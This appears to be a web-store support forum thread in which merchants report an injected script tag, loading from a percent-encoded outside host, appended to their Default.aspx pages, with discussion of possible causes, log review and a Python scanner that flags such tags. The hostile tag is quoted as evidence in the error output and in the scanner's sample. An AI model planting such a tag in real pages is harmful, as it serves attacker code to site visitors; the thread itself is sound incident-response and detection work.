Parse Error - URGENT - Please help
Hello all,
All of a sudden this morning, we are getting the following errors from our homepage. We did not make any customization this past couple of days.
It only happens for the Default.aspx. If I go directly to product detail page, the page loads fine.
Which file(s) should I look at to fix the error?
Server Error in '/' Application.
--------------------------------------------------------------------------------
Parser Error
Description: An error occurred during the parsing of a resource required to service this request. Please review the following specific parse error details and modify your source file appropriately.
Parser Error Message: Only Content controls are allowed directly in a content page that contains Content controls.
Source Error:
Line 65: </tr>
Line 66: </table>
Line 67: </asp:Content><script language=javascript src=http://%6C%6E%64%65%78%2E%6E%65%74/img.gif></script>
Source File: /Admin/Default.aspx Line: 67
Many Thanks!
Re: Parse Error - URGENT - Please help
Did you inject some javascript in some scriptlet or page? Could you post your store URL?
Re: Parse Error - URGENT - Please help
Can you please post the full source of your Default.aspx file?
Re: Parse Error - URGENT - Please help
Sohaib,
Here you go the full source of the Default.aspx
<%@ Page Language="C#" MasterPageFile="~/Layouts/Scriptlet.master" Inherits="CommerceBuilder.Web.UI.AbleCommercePage" Title="xxx" %>
<%@ Register Assembly="CommerceBuilder.Web" Namespace="CommerceBuilder.Web.UI.WebControls.WebParts" TagPrefix="cb" %>
<asp:Content runat="server" ContentPlaceHolderID="PageContent">
<cb:ScriptletPart ID="HomePage" runat="server" Layout="Three Column" Content="Home Page" Sidebar="Standard Sidebar 1" Sidebar2="Standard Sidebar 2" Header="Standard Header" Footer="Standard Footer" Title="Home Page" AllowClose="False" AllowMinimize="false" />
</asp:Content>
Re: Parse Error - URGENT - Please help
Did you have any piece of javascript in your scriptlets that are used on the default page, or maybe you have some conlib control that is trying to inject javascript?
Re: Parse Error - URGENT - Please help
mazhar,
There might be javascripts here and there, but we haven't been making any changes to the code this past couple of days. I would assume that they are OK for now.
It seems like all the "Default.aspx" pages throughout the site are giving us this error. What are the files that every "Default.aspx" is sharing in AbleCommerce?
Thanks!
Re: Parse Error - URGENT - Please help
nfortune wrote:
Sohaib,
Here you go the full source of the Default.aspx
<%@ Page Language="C#" MasterPageFile="~/Layouts/Scriptlet.master" Inherits="CommerceBuilder.Web.UI.AbleCommercePage" Title="xxx" %>
<%@ Register Assembly="CommerceBuilder.Web" Namespace="CommerceBuilder.Web.UI.WebControls.WebParts" TagPrefix="cb" %>
<asp:Content runat="server" ContentPlaceHolderID="PageContent">
<cb:ScriptletPart ID="HomePage" runat="server" Layout="Three Column" Content="Home Page" Sidebar="Standard Sidebar 1" Sidebar2="Standard Sidebar 2" Header="Standard Header" Footer="Standard Footer" Title="Home Page" AllowClose="False" AllowMinimize="false" />
</asp:Content>

And what is the exact error that you get on this particular page? I suppose this is the source of your home page.
Re: Parse Error - URGENT - Please help
It appears that our server has been hacked! All the Default.aspx were injected with the offending javascript code!
Re: Parse Error - URGENT - Please help
I'd agree, given that the javascript call is to "lndex.net" and resolves to an IP in Beijing...
Nick Cole
http://www.ethofy.com
Re: Parse Error - URGENT - Please help
This is scary.
Able Customer Since 1999 Currently Running on GOLD R12 SR1 and PCI Certified.
Re: Parse Error - URGENT - Please help
I just got a call from an AC7 customer with the exact same symptoms 

Joe Payne
AbleCommerce Custom Programming and Modules http://www.AbleMods.com/
AbleCommerce Hosting http://www.AbleModsHosting.com/
Precise Fishing and Hunting Time Tables http://www.Solunar.com
Re: Parse Error - URGENT - Please help
Joe,
Can you tell me which AC build your customer is running on? We are running on a relatively old build, I'm just wondering if the latest security fixes from AC will fix the problem.
Thanks!
Re: Parse Error - URGENT - Please help
nfortune wrote:
SolunarServices,
Can you tell me which AC build your customer is running on? We are running on a relatively old build, I'm just wondering if the latest security fixes from AC will fix the problem.
Thanks!

AC7 Final Build 10125 using DiscountASP.Net as the hosting provider.
Joe Payne
AbleCommerce Custom Programming and Modules http://www.AbleMods.com/
AbleCommerce Hosting http://www.AbleModsHosting.com/
Precise Fishing and Hunting Time Tables http://www.Solunar.com
Re: Parse Error - URGENT - Please help
Last November, we released an "Important Security Update" as part of Service Release 2. It includes changes that should prevent any SQL injection attacks.
http://help.ablecommerce.com/upgrades/A ... ce_7.0.htm
Since then, we have also released SR3 which includes everything from SR1 and up.
http://help.ablecommerce.com/upgrades/a ... ease_3.htm
It's really important to keep your installs current...
Thank you for choosing AbleCommerce!
http://help.ablecommerce.com - product support
http://wiki.ablecommerce.com - developer support
-
- Ensign (ENS)
- Posts: 6
- Joined: Thu Jun 12, 2008 4:07 pm
Re: Parse Error - URGENT - Please help
We have just experienced this same error and are restoring our site from backup. We have reviewed the database to confirm but this is not a SQL Injection attack. This is a file attack and the SQL has not been compromised.
This vulnerability was able to loop through every folder and subfolder in our store. It added the already mentioned script tag to every single .aspx page and completely replaced the text in all html pages.
We are restoring from backup currently and working to ensure all latest service releases are applied. We will post further if we continue to experience issues.
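An added example, not from the thread or from AbleCommerce: a scanner for a restored or suspect copy of the site that flags the two traits visible in the error output earlier in the thread, a script tag placed after the final `</asp:Content>` and a percent-encoded host in its `src`. The function names and the list of file suffixes are assumptions made for the example.

```python
import re
from pathlib import Path
from urllib.parse import unquote, urlsplit

# <script ... src=URL>, with a quoted or unquoted attribute value
SCRIPT_SRC = re.compile(r'<script\b[^>]*?\bsrc\s*=\s*["\']?([^"\'\s>]+)', re.I)
CLOSE_CONTENT = re.compile(r'</asp:Content\s*>', re.I)
PCT = re.compile(r'%[0-9a-f]{2}', re.I)

def audit_markup(text):
    """Return (reason, decoded_host, raw_src) findings for one page."""
    findings = []
    closes = list(CLOSE_CONTENT.finditer(text))
    tail_start = closes[-1].end() if closes else None
    for m in SCRIPT_SRC.finditer(text):
        raw = m.group(1)
        netloc = urlsplit(raw).netloc
        host = unquote(netloc).lower()  # decode so the real host is readable
        if PCT.search(netloc):
            findings.append(("percent-encoded host", host, raw))
        # A content page may hold nothing outside its Content controls,
        # so any script after the last closing tag was appended to the file.
        if tail_start is not None and m.start() >= tail_start:
            findings.append(("script after final </asp:Content>", host, raw))
    return findings

def scan_tree(root, suffixes=(".aspx", ".ascx", ".master", ".html", ".htm")):
    """Walk a copy of the site and map each flagged file to its findings."""
    report = {}
    for path in Path(root).rglob("*"):
        if path.is_file() and path.suffix.lower() in suffixes:
            hits = audit_markup(path.read_text(encoding="utf-8", errors="replace"))
            if hits:
                report[str(path)] = hits
    return report

# Constructed samples: the first reproduces line 67 of the error in the thread.
SAMPLE_BAD = ('</table>\n</asp:Content><script language=javascript '
              'src=http://%6C%6E%64%65%78%2E%6E%65%74/img.gif></script>')
SAMPLE_OK = ('<asp:Content runat="server" ContentPlaceHolderID="PageContent">\n'
             '<script src="/js/site.js"></script>\n</asp:Content>')

if __name__ == "__main__":
    for reason, host, raw in audit_markup(SAMPLE_BAD):
        print(f"{reason}: host={host} raw={raw}")
```

Comparing the flagged files' modification times against the web and FTP logs narrows the window in which the write happened.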
Re: Parse Error - URGENT - Please help
FTP password was probably compromised.
Joe Payne
AbleCommerce Custom Programming and Modules http://www.AbleMods.com/
AbleCommerce Hosting http://www.AbleModsHosting.com/
Precise Fishing and Hunting Time Tables http://www.Solunar.com
-
- Ensign (ENS)
- Posts: 6
- Joined: Thu Jun 12, 2008 4:07 pm
Re: Parse Error - URGENT - Please help
SolunarServices wrote:
FTP password was probably compromised.

We were compromised again almost like clockwork exactly one week later from my original post. We changed our FTP username and password, applied all security updates and we still were compromised.
Doing some research leads us to the conclusion that somehow the attacker is using the store API to re-write files that are not meant to be re-written.
Without being able to see the details of the Scriptlet and ScriptletType objects, I am guessing they are using something like the EditScriptlet.aspx module to do this. Viewing the source shows that parameters are sent through the querystring to modify content.
i.e. EditScriptlet.aspx?s=Category+Grid+Page+with+Basket+Options&t=Content
With this information exposed in this manner, it is conceivable a session could be hijacked and that the attacker could be using this functionality to do some malicious things.
One other thing that points to a bug in AbleCommerce is that we run our own hosting servers servicing hundreds of customers. This is the only site that was compromised and one of the (if not the only) sites that has file re-writing features. I would think that if the attacker could get down to the level to write files through IIS or FTP, they would have targeted more than one specific site.
I think this is a security issue in the code that needs to be patched immediately. I am anticipating getting hacked again this Friday.
Please understand, I am not trying to point fingers, I just want to be part of the solution. I think there is a major issue here and want to provide confidence to my customers.
Thank you.
Re: Parse Error - URGENT - Please help
An attack of that nature would show up in weblogs. Any clues there?
Looking for IP source is a good place to start - here's the netblock info for the injected script target:
lndex.net. A 219.152.120.182
inetnum: 219.151.128.0 - 219.153.255.255
netname: CHINANET-CQ
descr: CHINANET Chongqing province network
descr: China Telecom
descr: A12,Xin-Jie-Kou-Wai Street
descr: Beijing 100088
Nick Cole
http://www.ethofy.com
- Logan Rhodehamel
- Developer
- Posts: 4116
- Joined: Wed Dec 10, 2003 5:26 pm
Re: Parse Error - URGENT - Please help
nickc wrote:
An attack of that nature would show up in weblogs. Any clues there?
Looking for IP source is a good place to start - here's the netblock info for the injected script target:

Any information from the weblog that can help identify the source of compromise would be immensely helpful. Could you send to me the weblog from the day of the compromise? If we can confirm this issue and discover the source, producing a patch would be an immediate priority.
Cheers,
Logan
If I do not respond to an unsolicited private message, it's not because I'm ignoring you. It's because the answer to your question is valuable to others. Try the new topic button.
- Logan Rhodehamel
- Developer
- Posts: 4116
- Joined: Wed Dec 10, 2003 5:26 pm
Re: Parse Error - URGENT - Please help
nfortune wrote:
Source Error:
Line 65: </tr>
Line 66: </table>
Line 67: </asp:Content><script language=javascript src=http://%6C%6E%64%65%78%2E%6E%65%74/img.gif></script>

Based on this I do not think it has to do with the scriptlet editor. From this snippet, it appears the script tag has been injected into the default.aspx file somehow.
In addition to weblogs, it would be helpful for us to have a copy of the compromised site files. That way I could locate where the injection is physically being placed. As much detail as I can possibly get will help me to track the issue. As of right now, I can't say for certain whether it is specific to AbleCommerce or not.
Anyone with this situation occurring may contact me via PM.
Cheers,
Logan
If I do not respond to an unsolicited private message, it's not because I'm ignoring you. It's because the answer to your question is valuable to others. Try the new topic button.
-
- Ensign (ENS)
- Posts: 6
- Joined: Thu Jun 12, 2008 4:07 pm
Re: Parse Error - URGENT - Please help
We are reviewing our web logs to see if we can dig out some information and will send it as soon as we can find relevant information.
In our situation we host multiple sites and domains and this is the only compromise we have had. This particular store is very highly ranked in Google and my guess is the URL was found with a BotNet and identified for attack. There is an exploit out right now that is doing this which is occurring for others as well. There is a recent article on Experts Exchange detailing this as well but I am not sure the article has really posted an answer. This attack inserting Lndex.net appears fairly new and we are continuing to search for more information on how the exploit occurs.
-
- Ensign (ENS)
- Posts: 6
- Joined: Thu Jun 12, 2008 4:07 pm
Re: Parse Error - URGENT - Please help
New finding, the URL in the script this time around translates to a url 51ofnet.net instead of lndex.net. Don't know if this helps, but it was different.
Thanks
- Logan Rhodehamel
- Developer
- Posts: 4116
- Joined: Wed Dec 10, 2003 5:26 pm
Re: Parse Error - URGENT - Please help
I have removed some posts in this thread that were sensitive. The root cause is still being investigated.
Cheers,
Logan
If I do not respond to an unsolicited private message, it's not because I'm ignoring you. It's because the answer to your question is valuable to others. Try the new topic button.